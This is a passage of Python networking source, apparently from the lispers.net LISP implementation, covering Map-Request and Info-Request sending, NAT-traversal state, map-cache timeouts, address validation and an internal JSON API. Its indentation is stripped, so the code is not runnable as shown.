# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
if (nat_info and len(lisp_sockets) == 4):
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest,
nat_info, packet)
return
#endif
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so the lisp-itr and lisp-etr processes don't
# both add and delete host routes (for Info-Request sending purposes) at
# the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# Wait for the host route to go away before proceeding. We will use
# the map-server host route as an IPC lock. For the data port, only
# the lisp-etr process will add a host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to the control port via the control-sockets interface. For
# port 4341, do the same via the lisp-core process but prepend a LISP data
# header to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove the static route to the RTR if we had added one, and restore the
# data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname in private-rloc in Info-Reply. Encode it as
# an AFI=17 distinguished-name.
#
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache Info-Request sources so we can process Map-Requests from them
# specially and proxy Map-Requests when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
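#
# Note: the unconditional return above disables the test code below. To
# exercise it, remove the return; it primes the map-cache and measures
# Map-Resolver RTT by sending the Map-Requests that follow.
#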
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is, check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Check activity timers for encapsulation entries only.
#
if (mc.action == LISP_NO_ACTION):
now = lisp_get_timestamp()
if (mc.last_refresh_time + mc.map_cache_ttl > now):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from the map-cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} dictionary is keyed by hostname; each value is
# an array of lisp_nat_info() entries. We keep all the current and previous
# NAT state associated with the Info-Request hostname. This is so we can
# track how much movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the port-4341 Info-Request on, and install an
# ephemeral static route to force the Info-Request to go out a specific
# interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
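#
# Illustrative values accepted by lisp_valid_address_format(): "10.0.0.1"
# (IPv4), "2001:db8::1" (IPv6), "0000-1111-2222" (MAC), "+14085551212"
# (E.164), "'my-rloc-name'" (distinguished-name), and geo-prefixes that
# contain N/S/W/E components.
#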
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
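# For example (illustrative values):
#
#   "map-cache%{"instance-id": "0", "eid-prefix": "10.0.0.1/32"}"
#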
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
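#
# Each entry appended above is a dictionary of the form (illustrative
# values): {"instance-id": "0", "eid-prefix": "10.1.0.0/16", "uptime": ...,
# "ttl": "15", "rloc-set": [{"address": ..., "state": ..., ...}, ...]}.
#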
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to the API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-server or map-resolver information to the API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
